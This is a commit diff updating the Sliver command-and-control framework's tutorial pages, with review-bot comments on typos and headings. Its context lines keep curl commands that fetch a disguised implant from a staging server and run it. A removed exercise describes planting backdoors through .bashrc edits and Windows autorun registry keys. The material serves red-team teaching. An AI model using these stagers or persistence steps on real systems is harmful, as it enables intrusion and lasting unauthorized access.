update tutorial text and add 1.6 disclaimer
TimBF committed Jul 22, 2024
1 parent 36e0c71 commit eed6890
Showing 8 changed files with 140 additions and 92 deletions.
54 changes: 0 additions & 54 deletions docs/sliver-docs/nohup.out

This file was deleted.
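Review bot: `docs/sliver-docs/nohup.out` is the output file `nohup` writes, so deleting it here does not stop it from reappearing the next time the docs site is started that way. Check that `nohup.out` is ignored for `docs/sliver-docs/`, and add the ignore entry in this same change if it is not.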

4 changes: 2 additions & 2 deletions docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
This course will use the latest Sliver build, you can download it from [insert local web server].
# This course is intented for the 1.6 version of Sliver, which is not yet published

`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.
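Review bot: the new first line misspells "intended" as "intented", and written as a `#` heading it becomes the title of the Getting Started page. A plain note or blockquote would fit better, for example "This course is intended for Sliver 1.6, which is not yet published." The line it replaces was where the page said where to download the build, so after this change the reader is not told how to obtain a 1.6 binary.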

Expand Down Expand Up @@ -85,4 +85,4 @@ Running an interactive shell

```asciinema
{"src": "/asciinema/shell.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
```
```
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Beacons vs Sessions

Sliver implants support two types of connections, sessions and beacons.

Sessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.
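Review bot: with `# Beacons vs Sessions` gone from the top of the file the page opens directly on body text, while the Getting Started change in this same commit adds a `#` line. Confirm the site takes the page title from the file name, otherwise this page renders without one. The unchanged line below still reads "long-poling", which should be "long-polling".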
Expand Down Expand Up @@ -66,8 +64,6 @@ Commands issued for beacons can be viewed using `tasks`, the task state will ind
{"src": "/asciinema/beacon_tasks.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
```

beacon_tasks.cast

Session can be spun up using the `interractive` command.

```asciinema
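Review bot: the unchanged line after the removed `beacon_tasks.cast` still names the command as `interractive`; the Sliver command is `interactive`, so the text as written does not match what the reader has to type. Worth fixing while this hunk is open, along with "Session can be" to "Sessions can be".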
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Stagers

When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.

For this exercise we will create a new beacon profile and prepare to stage it.
Expand All @@ -18,7 +16,7 @@ There is a lot of flexibility in the form of this URL, the conditions for succes
* There has to be a one character http url parameter
* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values

To expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.
To expose a payload you need to use the `implants stage` command and specifically select the implant to leave accessible.

```asciinema
{"src": "/asciinema/stage_implant.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8}
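Review bot: the rewritten sentence ends with "select the implant to leave accessible", which no longer says accessible from where or to what; the previous wording at least said "externally". Suggest stating what serves the staged implant and at which URL, since the bullets just above describe the URL conditions and the reader needs to connect the two.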
Expand All @@ -45,4 +43,4 @@ curl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && c
Or on Windows:
```
curl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\t.exe
```
```
2 changes: 0 additions & 2 deletions docs/sliver-docs/pages/tutorials/md/5 - Pivots.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
# Pivots

Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.

Sliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.
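Review bot: the two context lines kept under the removed heading still contain "usefull" and lower-case "windows only". Since this commit is a tutorial text update, correct them to "useful" and "Windows only" here.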
27 changes: 2 additions & 25 deletions docs/sliver-docs/pages/tutorials/md/6 - Scripting.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,3 @@
## Sliver Reactions

Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.

```bash
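Review bot: removing `## Sliver Reactions` at the top leaves the reactions material without a heading, while the next hunk shows `## Sliver-py` is kept further down the same file. The page then has one untitled section followed by a titled one; either keep the `## Sliver Reactions` heading or restructure so both parts sit at the same level.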
Expand Down Expand Up @@ -49,7 +47,7 @@ You can remove reactions using `reaction unset`.

However, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running.

Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.
Secondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript for example to connect to the server over gRPC, which we’ll cover next.

## Sliver-py
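Review bot: in the added sentence, "for example" sits after "Python or Typescript", so it reads as if connecting over gRPC were the example. Suggest "you can instead write your own client, for example in Python or TypeScript, to connect to the server over gRPC, which we'll cover next." Note the capitalisation of TypeScript.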

Expand All @@ -74,16 +72,10 @@ Since our extension is essentially going to be another client connection to the
[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg
```

We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:

```html
pip3 install ipython3
```

We now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell.
We first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.

```bash
tester@test ~/t/sliver> ipython3
Python 3.9.16 (main, Dec 7 2022, 10:06:04)
Type 'copyright', 'credits' or 'license' for more information
IPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.
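Review bot: the transcript kept at the end of this hunk still shows the IPython banner ("IPython 8.0.1 -- An enhanced Interactive Python"), but the paragraph recommending `ipython3` is removed, so the prose now says "a Python shell" while the output comes from IPython. Either keep a one-line mention that the examples were recorded in IPython or re-record the block in a plain interpreter. The added sentence also runs straight into "We first need to import a few dependencies" with no blank line between them, so the two will render as a single paragraph.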
Expand Down Expand Up @@ -224,18 +216,3 @@ b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# This is a sample HOSTS fil
Automatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2
b'##\n# Host Database\n#\n# localhost is used to configure the loopback interface\n# when the system is booting. Do not change this entry.\n##\n127.0.0.1...
```
As an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.
Here are a couple hints:
- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc
- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload("/home/target/.bashrc", contents + b'\r\necho "pwned !"')`.
- For Windows you can look at the `registry_read` and `registry_create_key` functions.
## References
- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)
- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)
- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)
- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)
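Review bot: the end of this hunk drops the whole `## References` list together with the exercise. Those four links are the only pointers to the sliver-py and client-writing documentation in the visible lines of this page, and nothing in the hunk replaces them. Keep the list, or move it to a place the tutorial links to.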